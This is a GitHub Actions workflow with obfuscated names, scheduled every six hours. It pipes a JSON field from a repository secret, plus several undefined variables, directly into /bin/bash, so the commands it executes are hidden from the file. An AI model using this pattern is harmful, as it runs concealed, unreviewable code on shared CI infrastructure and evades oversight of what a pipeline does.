name: yuchangkan3910

on:
  workflow_dispatch:
  schedule:
    - cron: '57 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: yuchangkan3910
        env:
          ucp80715: ${{ secrets.ucp80715 }}
        run: |
          echo $ucp80715 | jq -r .yno555 | /bin/bash
          echo $vwfh82058 | jq -r .x7 | /bin/bash
          echo $u20 | jq -r .ib90 | /bin/bash
          echo $x6 | jq -r .drh32158 | /bin/bash
          echo $pnz92916 | jq -r .bxhr3 | /bin/bash

